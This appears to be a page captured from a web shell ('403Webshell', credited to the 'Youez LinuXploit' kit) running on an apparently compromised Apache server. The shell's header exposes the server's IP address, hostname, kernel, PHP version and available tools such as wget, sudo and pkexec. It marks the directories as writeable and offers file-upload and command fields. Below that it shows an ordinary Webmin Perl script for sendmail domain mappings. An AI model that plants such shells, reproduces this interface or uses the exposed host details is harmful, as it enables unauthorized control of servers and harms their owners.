403Webshell
Server IP : 182.53.201.61  /  Your IP : 216.73.217.175
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/libexec/webmin/sendmail/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/libexec/webmin/sendmail/save_domain.cgi
#!/usr/bin/perl
# save_domain.cgi
# Save, create or delete an address mapping

require './sendmail-lib.pl';
require './domain-lib.pl';
&ReadParse();
$access{'domains'} || &error($text{'dsave_ecannot'});
$conf = &get_sendmailcf();
$dfile = &domains_file($conf);
&lock_file($dfile);
($ddbm, $ddbmtype) = &domains_dbm($conf);
@doms = &list_domains($dfile);
if (!$in{'new'}) { $d = $doms[$in{'num'}]; }
foreach $du (@doms) { $already{$du->{'from'}}++; }

if ($in{'delete'}) {
	# delete some mapping
	$logd = $d;
	&delete_domain($d, $dfile, $ddbm, $ddbmtype);
	}
else {
	# Saving or creating.. check inputs
	&error_setup($text{'dsave_err'});
	$in{'from'} =~ /^[A-z0-9\.\-]+$/ ||
		&error(&text('dsave_edomain', $in{'from'}));
	$in{'to'} =~ /^[A-z0-9\.\-]+$/ ||
		&error(&text('dsave_edomain', $in{'to'}));
	if ($in{'new'} || lc($in{'from'}) ne lc($d->{'from'})) {
		($same) = grep { lc($_->{'from'}) eq lc($in{'from'}) }
			       @doms;
		$same && &error(&text('dsave_ealready', $in{'from'}));
		}
	$newd{'from'} = $in{'from'};
	$newd{'to'} = $in{'to'};
	$newd{'cmt'} = $in{'cmt'};
	if ($in{'new'}) { &create_domain(\%newd, $dfile, $ddbm, $ddbmtype); }
	else { &modify_domain($d, \%newd, $dfile, $ddbm, $ddbmtype); }
	$logd = \%newd;
	}
&unlock_file($dfile);
&webmin_log($in{'delete'} ? 'delete' : $in{'new'} ? 'create' : 'modify',
	    "domain", $logd->{'from'}, $logd);
&redirect("list_domains.cgi");


Youez - 2016 - github.com/yon3zu
LinuXploit